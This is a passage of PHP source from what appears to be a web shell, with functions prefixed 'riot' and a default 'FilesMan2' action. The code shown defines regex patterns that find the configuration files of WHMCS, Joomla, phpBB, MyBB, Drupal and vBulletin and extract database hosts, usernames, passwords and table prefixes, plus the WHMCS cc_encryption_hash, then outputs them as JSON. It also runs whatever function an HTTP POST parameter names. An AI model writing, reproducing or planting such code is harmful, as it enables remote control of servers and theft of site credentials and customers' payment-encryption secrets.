"dbuser" => ["/db_username(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
"dbpw" => ["/db_password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
"cc_encryption_hash" => ["/cc_encryption_hash(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
],
"joomla" => [
"file" => "/configuration.php",
"host" => ["/\\\$host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
"dbname" => ["/\\\$db(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
"dbuser" => ["/\\\$user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
"dbpw" => ["/\\\$password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
"prefix" => ["/\\\$dbprefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
],
"phpbb" => [
"file" => "/config.php",
"host" => ["/dbhost(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
"dbname" => ["/dbname(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
"dbuser" => ["/dbuser(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
"dbpw" => ["/dbpasswd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
"prefix" => ["/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
],
"mybb" => [
"file" => "/inc/config.php",
"host" => ["/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
"dbname" => ["/config\['database'\]\['database'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
"dbuser" => ["/config\['database'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
"dbpw" => ["/config\['database'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
"prefix" => ["/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
],
];
if ($cms == "drupal") {
$file = $config[$cms]["file"];
$file = $path . $file;
if (@is_file($file) || _riot_is_dir($file, "-e")) {
} else {
$cms = "drupal2";
}
}
if ($cms == "vb") {
$file = $config[$cms]["file"];
$file = $path . $file;
if (@is_file($file) || _riot_is_dir($file, "-e")) {
} else {
$path .= "/core";
}
}
$data = [];
$srch_host = $config[$cms]["host"][0];
$srch_user = $config[$cms]["dbuser"][0];
$srch_name = $config[$cms]["dbname"][0];
$srch_pw = $config[$cms]["dbpw"][0];
$prefix = $config[$cms]["prefix"][0];
$file = $config[$cms]["file"];
$chost = $config[$cms]["host"][1];
$cuser = $config[$cms]["dbuser"][1];
$cname = $config[$cms]["dbname"][1];
$cpw = $config[$cms]["dbpw"][1];
$cprefix = $config[$cms]["prefix"][1];
if (@is_dir($path) || _riot_is_dir($path)) {
$file = $path . $file;
} elseif (@is_file($path) || _riot_is_dir($path, "-e")) {
$file = $path;
} else {
return false;
}
$file = __read_file($file);
if ($cms == "drupal2") {
$file = preg_replace("/\@code(.*?)\@endcode/s", "", $file);
} elseif ($cms == "vb") {
$file = preg_replace("/right of the(.*?)BAD!/s", "", $file);
}
if (preg_match($srch_host, $file, $mach)) {
$data["host"] = $mach[$chost];
}
if (preg_match($srch_user, $file, $mach)) {
$data["user"] = $mach[$cuser];
}
if (preg_match($srch_name, $file, $mach)) {
$data["dbname"] = $mach[$cname];
}
if (preg_match($srch_pw, $file, $mach)) {
$data["password"] = $mach[$cpw];
}
if (isset($prefix)) {
if (preg_match($prefix, $file, $mach)) {
$data["prefix"] = $mach[$cprefix];
}
}
if ($cms == "whmcs") {
if (preg_match($config[$cms]["cc_encryption_hash"][0], $file, $mach)) {
$data["cc_encryption_hash"] = $mach[3];
}
}
echo json_encode($data);
}
if (empty($_POST["a"])) {
if (isset($default_action) && function_exists("riot" . $default_action)) {
$_POST["a"] = $default_action;
} else {
$_POST["a"] = "FilesMan2";
}
}
if (!empty($_POST["a"]) && function_exists("riot" . $_POST["a"])) {
call_user_func("riot" . $_POST["a"]);
}
exit();
?>